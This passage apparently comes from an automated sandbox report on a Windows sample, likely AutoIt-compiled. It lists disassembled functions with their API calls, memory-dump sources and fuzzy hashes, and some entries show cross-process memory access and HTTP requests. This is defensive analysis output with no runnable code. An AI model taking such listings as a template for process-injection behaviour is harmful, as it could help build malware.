                • Instruction Fuzzy Hash: B131AA7270021D9FDB00CF68D989AAE7BA5EB45324F518226FD14E7381D774ED51CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004377D0, Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 00437806
                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 00437820
                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 00437841
                • GetCursorPos.USER32(00000000), ref: 0043788E
                • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 004378B5
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CursorMenuPopupTrack$Proc
                • String ID:
                • API String ID: 1300944170-0
                • Opcode ID: db19de0eaa32503e9ed99d95b20d534e72d96d9d4de13803aec05c98a85ce9b7
                • Instruction ID: 76685b34b27013b1841d7c042fe8795982cd04dd4f21e67e69693ec108ed8046
                • Opcode Fuzzy Hash: db19de0eaa32503e9ed99d95b20d534e72d96d9d4de13803aec05c98a85ce9b7
                • Instruction Fuzzy Hash: B231C475600108AFDB24DF58DC88FAB7769EB8D311F10416AF6488B391DB756C52CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004378C4, Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Client$CursorFromPointProcRectScreenWindow
                • String ID:
                • API String ID: 1822080540-0
                • Opcode ID: 06086d3111e9c2d30ba0e98c164fe549f88e4685525d9b31ab137a8c5a6d9eb2
                • Instruction ID: a635363f16cb0b1134031011c6e16c186eb814290897058e6ffbc52c7169b56b
                • Opcode Fuzzy Hash: 06086d3111e9c2d30ba0e98c164fe549f88e4685525d9b31ab137a8c5a6d9eb2
                • Instruction Fuzzy Hash: 09316CB12042019FD720DF19D884A6B77A4FFC9314F144A2EF8948B291D774EC96CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00445071, Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62d03e5c9d41714caff77268b5251c68e99245e9b43894d391b5fb730a034f19
                • Instruction ID: f961b59ce5c6f33761b4dcac1ff0fb5b3e272ac3e8b6b6309e1281a980d8f703
                • Opcode Fuzzy Hash: 62d03e5c9d41714caff77268b5251c68e99245e9b43894d391b5fb730a034f19
                • Instruction Fuzzy Hash: 7921BD752006019BDB20EF69D9C4C6B77A8EF89320B00466AFE4587396DB34EC45CBB9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00435776, Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                Download Yara Rule
                APIs
                • IsWindowVisible.USER32 ref: 0043577F
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00435799
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004357D3
                • _wcslen.LIBCMT ref: 00435801
                • CharUpperBuffW.USER32(00000000,00000000), ref: 0043580B
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                • String ID:
                • API String ID: 3087257052-0
                • Opcode ID: 92d1e24577e558a04f08f0bb69a015e24bab56dfb06ff6fd928dc01307aff1f6
                • Instruction ID: da6b0d98e744ae519cfafca94315f16b7e6fb0b4c3e35d85cde79e62dd18c46f
                • Opcode Fuzzy Hash: 92d1e24577e558a04f08f0bb69a015e24bab56dfb06ff6fd928dc01307aff1f6
                • Instruction Fuzzy Hash: 67110A7260054177E7109B65DC46F5BB78CAF65360F04803AF809E7780EB79F94583A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004370BF, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                Download Yara Rule
                APIs
                • DeleteObject.GDI32(00000000), ref: 004370FC
                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                • SelectObject.GDI32(?,00000000), ref: 0043714C
                • BeginPath.GDI32(?), ref: 00437161
                • SelectObject.GDI32(?,00000000), ref: 0043718A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Object$Select$BeginCreateDeletePath
                • String ID:
                • API String ID: 2338827641-0
                • Opcode ID: e6532d6f426f90810e4069e16e10a8348652a773ad4c4ea5518e15d5226bfcaa
                • Instruction ID: c14b4600aeb7f94cb32968877b7643b7868304d8f2f128594d75b220a8650c09
                • Opcode Fuzzy Hash: e6532d6f426f90810e4069e16e10a8348652a773ad4c4ea5518e15d5226bfcaa
                • Instruction Fuzzy Hash: 9E2171B28052559BCB20CF6DAD48A9E7BACE71A310F10417BF954D73A1D7749C80CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040F619, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • _malloc.LIBCMT ref: 0040F627
                  • Part of subcall function 004034DB: __FF_MSGBANNER.LIBCMT ref: 004034F4
                  • Part of subcall function 004034DB: __NMSG_WRITE.LIBCMT ref: 004034FB
                  • Part of subcall function 004034DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00406A35,?,00000001,?,?,00408179,00000018,0047D180,0000000C,00408209), ref: 00403520
                • _free.LIBCMT ref: 0040F63A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: 70479be5722ea38f06b19c12de59f5521ec95656ff25d8c942055be83adb4726
                • Instruction ID: b2dcc88996d49ddabe27883aaf213ab7cf9b812d796e70892f7aa83299fb5c3a
                • Opcode Fuzzy Hash: 70479be5722ea38f06b19c12de59f5521ec95656ff25d8c942055be83adb4726
                • Instruction Fuzzy Hash: 9911C833905614ABCB313B75E80465A3758DF40361B218C3BF848BA6E1DB3E988687AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00424569, Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNEL32(00000000), ref: 0042457F
                • QueryPerformanceCounter.KERNEL32(?), ref: 0042459C
                • Sleep.KERNEL32(00000000), ref: 004245BB
                • QueryPerformanceCounter.KERNEL32(?), ref: 004245C5
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                • API String ID: 2875609808-0
                • Opcode ID: 2663cc80da30a0a5d23d69d4973528f61e914ea07fc15fc6bad509e25c9f7816
                • Instruction ID: c3945cd3c820976d2d644f2267ffc49e15b7b2a5820e5e64883d4f96f52eae37
                • Opcode Fuzzy Hash: 2663cc80da30a0a5d23d69d4973528f61e914ea07fc15fc6bad509e25c9f7816
                • Instruction Fuzzy Hash: 27116032A0052DE7CF009F99E944AEEBB78FF95721F404166EA4476240CA7495A18BE9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041FC95, Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Path$ObjectStroke$DeleteFillSelect
                • String ID:
                • API String ID: 2625713937-0
                • Opcode ID: d8c0c087c5cc441d46573806db3e0732beeff55720350fa1d0008c45b461b1bb
                • Instruction ID: 6308a880c2faf890e6ee69c0cc73bfd2f3e21f983e467633edcddb55e76ce65c
                • Opcode Fuzzy Hash: d8c0c087c5cc441d46573806db3e0732beeff55720350fa1d0008c45b461b1bb
                • Instruction Fuzzy Hash: CEF086711025449BD3009B2CED0CB9E3768B762321F044237E919973E1DB7458DADBBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407726, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                Download Yara Rule
                APIs
                • __getptd.LIBCMT ref: 00407732
                  • Part of subcall function 0040798C: __getptd_noexit.LIBCMT ref: 0040798F
                  • Part of subcall function 0040798C: __amsg_exit.LIBCMT ref: 0040799C
                • __getptd.LIBCMT ref: 00407749
                • __amsg_exit.LIBCMT ref: 00407757
                • __lock.LIBCMT ref: 00407767
                • __updatetlocinfoEx_nolock.LIBCMT ref: 0040777B
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: c022c282af4e133699e0ebfaaaee71269d57b37905987a1f91b09e7cd1eb6721
                • Instruction ID: 5eff351928584c34f7820859d24314289e92bca7fbbb1e3dbd576e821260a13f
                • Opcode Fuzzy Hash: c022c282af4e133699e0ebfaaaee71269d57b37905987a1f91b09e7cd1eb6721
                • Instruction Fuzzy Hash: 33F06D32D087109BD760BB755802B5D72A0AF00768F21417FE445BB2D2DA7C79409A6F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426528, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00424300: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00424331
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00426579
                  • Part of subcall function 004242C4: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 004242F5
                  • Part of subcall function 00424394: GetWindowThreadProcessId.USER32(?,?), ref: 004243C7
                  • Part of subcall function 00424394: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004243D8
                  • Part of subcall function 00424394: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 004243EF
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004265E9
                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00426669
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                • API String ID: 4150878124-2766056989
                • Opcode ID: 608692a7f6c21d22c62a4d82794788a676b1a1d4efad8d7dac791ddb3c7743e8
                • Instruction ID: f8004bc3ebb3bd0d4cd30b762baa4092b9f0b66d3e179616cc6fc704fe118496
                • Opcode Fuzzy Hash: 608692a7f6c21d22c62a4d82794788a676b1a1d4efad8d7dac791ddb3c7743e8
                • Instruction Fuzzy Hash: 7A519A76B002186BCB10DBA5DD81FEEB778EFC5300F40459AFA05BB141D674AA45CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043A79A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                Download Yara Rule
                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043A7BE
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043A80D
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0043A845
                  • Part of subcall function 00432252: GetLastError.KERNEL32 ref: 00432268
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                • String ID:
                • API String ID: 3705125965-3916222277
                • Opcode ID: 236ed298ffe0413741bc23614c6e8d4864841ef3cbb36ac1e41b8092a0038617
                • Instruction ID: e6768091998e828f8cffb347aa25c957cda262ca07ffb2e64bee879f6f3c0959
                • Opcode Fuzzy Hash: 236ed298ffe0413741bc23614c6e8d4864841ef3cbb36ac1e41b8092a0038617
                • Instruction Fuzzy Hash: F731F636A412047AD720EF55DC42FDFB3ACDBD9710F10811FF514A7280D6B8950987A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044072D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004407D5
                • GetWindowLongW.USER32(?,000000F0), ref: 004407F3
                • SetWindowLongW.USER32 ref: 00440804
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                • API String ID: 847901565-1698111956
                • Opcode ID: a3422bf77bef36b11208e7e731e7e6d1bd6715807d363f7cb2946fe8daec1d80
                • Instruction ID: 8e76998106324942a45b1e2f995ec52e4ef051b2aa5ed2115cee440ad2eeec2f
                • Opcode Fuzzy Hash: a3422bf77bef36b11208e7e731e7e6d1bd6715807d363f7cb2946fe8daec1d80
                • Instruction Fuzzy Hash: D6415F71100205ABEB14DF69DC84FEB37A8EB49724F20471AF969972D0D778E891CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00424B10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(?), ref: 00424B1E
                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00424B96
                • FreeLibrary.KERNEL32(?), ref: 00424BAD
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: AU3_GetPluginDetails
                • API String ID: 145871493-4132174516
                • Opcode ID: 32c2bb6453234ad5a6e23653700c305f22a206559b5ccb5ee7a2b3e4e92bb03a
                • Instruction ID: 2dc75287940ccb6c072eed415207112832e7a04aa61ff5e5ef2f2e55df03014d
                • Opcode Fuzzy Hash: 32c2bb6453234ad5a6e23653700c305f22a206559b5ccb5ee7a2b3e4e92bb03a
                • Instruction Fuzzy Hash: F54137B9600615EFC710DF58D8C0E5AF7A5FF89300B5082AAE91A9B710D735FD52CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00440CE1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00440D73
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00440D8C
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00440DB4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                • Opcode ID: f84cf6a7f88fd5babfe672f31bd169a9b751a8cb48da52a5671632cbafd59f83
                • Instruction ID: 832920e08ca1ed41741ef88a22e5a0106a0caeb72516dc3306e8625160fc6461
                • Opcode Fuzzy Hash: f84cf6a7f88fd5babfe672f31bd169a9b751a8cb48da52a5671632cbafd59f83
                • Instruction Fuzzy Hash: AC318B716102086BEB10DEA9DC81FEB73ADEB98724F10471AFA14972C0D6B4FC558764
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044094E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(00000000), ref: 004409A5
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DestroyWindow
                • String ID: msctls_updown32
                • API String ID: 3375834691-2298589950
                • Opcode ID: 053c728db981a0ad5589b6d34572bc9d1d6b8392ea59f986c9d7edaff8628917
                • Instruction ID: d35254d0906639a076d7121eda7be0fb72ca207589387b655a62b8acceef6542
                • Opcode Fuzzy Hash: 053c728db981a0ad5589b6d34572bc9d1d6b8392ea59f986c9d7edaff8628917
                • Instruction Fuzzy Hash: D8315076640205ABEB10DF58DC81FA63768EF99724F20411AF7049B382C775AC56CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00440A42, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00440AB1
                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00440AC7
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00440AD5
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                • API String ID: 3850602802-1010561917
                • Opcode ID: d038651b2a970bbe0db219d82ab23d6078e31116ab59fd29a1babe74c2a6e588
                • Instruction ID: 68d90ae570d6388988a33e5c478c72e7fd15a0101a1267b2c84532b56956098d
                • Opcode Fuzzy Hash: d038651b2a970bbe0db219d82ab23d6078e31116ab59fd29a1babe74c2a6e588
                • Instruction Fuzzy Hash: 78115471750319BAEB10CE68EC81FD7739CAB58724F204116FB14BB2C0D2B5EC518BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00425223, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • CLSIDFromString.OLE32(?,00000000), ref: 00425244
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00425293
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004252C2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                • String ID: crts
                • API String ID: 943502515-3724388283
                • Opcode ID: 5dfa0908eb7d420c5a55efcafada74b846b1510f12ec03e82afce2b488255b50
                • Instruction ID: af2bdc5600a94aa0ec09a3b0e4ed6b5141c7c464ff21ffd878acb9aa6ac54798
                • Opcode Fuzzy Hash: 5dfa0908eb7d420c5a55efcafada74b846b1510f12ec03e82afce2b488255b50
                • Instruction Fuzzy Hash: 28211576600610DFC314CF8AE584C96FBE8EF98761704C47AE949CB761D334E891CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004211F9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0042120B
                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0042121D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
